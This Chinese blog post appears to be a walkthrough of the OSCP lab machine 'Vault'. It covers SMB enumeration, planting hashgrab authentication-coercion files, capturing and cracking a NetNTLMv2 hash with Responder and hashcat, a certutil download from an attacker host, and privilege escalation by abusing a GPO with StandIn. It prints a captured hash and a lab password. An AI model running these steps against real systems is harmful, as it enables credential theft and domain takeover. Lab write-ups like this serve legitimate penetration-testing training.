当前位置: 首页 > news >正文

OSCP 靶场 - Vault

端口扫描 nmap

nmap -O 192.168.162.172

smb枚举 smbmap(kali自带)

//枚举GUEST用户可以使用的目录
smbmap -u GUEST -H 192.168.162.172

NTLMrelay—smbrelay

1.制作钓鱼文件 使用GitHub - xct/hashgrab: generate payloads that force authentication against an attacker machine

python3 hashgrab.py 192.168.45.212 test

2. 上传钓鱼文件 使用smbclient(kali自带)

smbclient \\\\192.168.162.172\\DocumentsShare -U GUESTsmb: \> put @test.scf
smb: \> put @test.url 
smb: \> put test.lnk 

3. 开启responder(kali自带)监听,获取net-ntlm哈希

responder -I tun0

结果

anirudh::VAULT:8f86997471383614:4B76E3A7DF0BF24945D0A85F4575DF13:010100000000000000FF17E898FAD90199787A61B1D7F0CF0000000002000800380043004600580001001E00570049004E002D005A0052003000440048004B004F004800460046004A0004003400570049004E002D005A0052003000440048004B004F004800460046004A002E0038004300460058002E004C004F00430041004C000300140038004300460058002E004C004F00430041004C000500140038004300460058002E004C004F00430041004C000700080000FF17E898FAD9010600040002000000080030003000000000000000010000000020000077EEB54469D1F6103BA0F72DC177ACE44970D6FADE091CA17405179482A7C5F20A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200310032000000000000000000  

破解ntlm

1.准备好被破解的hash文件

2.准备好大字典(自己下载)

3.使用hashcat(kali自带) 破解得到密码

 hashcat -m 5600 -a 0 hashes.txt dict_big.txt --force

winrm工具连接目的主机—evil-winrm(kali自带)

evil-winrm -u ANIRUDH -p SecureHM -i 192.168.162.172

获取shell

桌面获取Flag1

gpo提权

使用GitHub - FuzzySecurity/StandIn: StandIn is a small .NET35/45 AD post-exploitation toolkit

原理: 通过工具枚举出当前用户在域控中的权限, 发现对域控有完全控制权限,然后将当前账号修改为本地管理员提权。

1. kali上准备好工具,python开启简易http

python3 -m http.server 8080

2. 被攻击主机下载工具

certutil.exe -urlcache -split -f http://192.168.45.166:8080/standin45.exe

3. 通过gpo提权

枚举出GPO

*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo
[?] Object   : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}Path     : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsecDisplayName              : Default Domain Controllers PolicyCN                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}GPCFilesysPath           : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]WhenCreated              : 11/19/2021 8:50:33 AMWhenChanged              : 11/19/2021 8:50:33 AM[?] Object   : CN={31B2F340-016D-11D2-945F-00C04FB984F9}Path     : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsecDisplayName              : Default Domain PolicyCN                       : {31B2F340-016D-11D2-945F-00C04FB984F9}GPCFilesysPath           : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}GPCMachineExtensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]WhenCreated              : 11/19/2021 8:50:33 AMWhenChanged              : 11/19/2021 9:00:32 AM

查看Default Domain Policy的用户权限,发现anirudh具备完全控制权限

*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --acl
[+] Account       : VAULT\anirudhType          : AllowRights        : FullControlInherited ACE : FalsePropagation   : None

将anirubh 修改为localadmin

*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --localadmin anirudh

刷新权限

*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force

此时anirubh 具备管理员权限, 进入administrator桌面即可拿到flag2

http://www.lryc.cn/news/273017.html

相关文章:

  • uniapp子组件向父组件传值
  • 过滤特殊 微信昵称
  • LLM、AGI、多模态AI 篇一:开源大语言模型简记
  • 微信小程序中获取用户当前位置的解决方案
  • Vue3-35-路由-路由守卫的简单认识
  • 制药企业符合CSV验证需要注意什么?
  • 再谈动态SQL
  • 【数据结构】树
  • 【Midjourney】AI绘画新手教程(一)登录和创建服务器,生成第一幅画作
  • 对比 PyTorch 和 TensorFlow:选择适合你的深度学习框架
  • Oracle笔记-查看表已使用空间最大空间
  • 大数据HCIE成神之路之特征工程——特征选择
  • python 正则-常见题目
  • 解析:Eureka的工作原理
  • RecyclerView 与 ListView 区别和使用
  • 力扣232. 用栈实现队列
  • 这个方法可以让你把图片无损放大
  • Springboot整合Elastic-job
  • VsCode的介绍和入门
  • C++:自创小游戏
  • AIGC带给开发者的冲击
  • 利用蚁剑钓鱼上线CS
  • 宣传照(私密)勿转发
  • 【Spring】19 AOP介绍及实例详解
  • ES(Elasticsearch)的基本使用
  • 【JVM面试题】Java中的静态方法为什么不能调用非静态方法
  • 对‘float16_t’的引用有歧义
  • Windows重装升级Win11系统后 恢复Mysql数据
  • MySQL之四大引擎、账号管理以及建库
  • shell编程——查找局域网内存活主机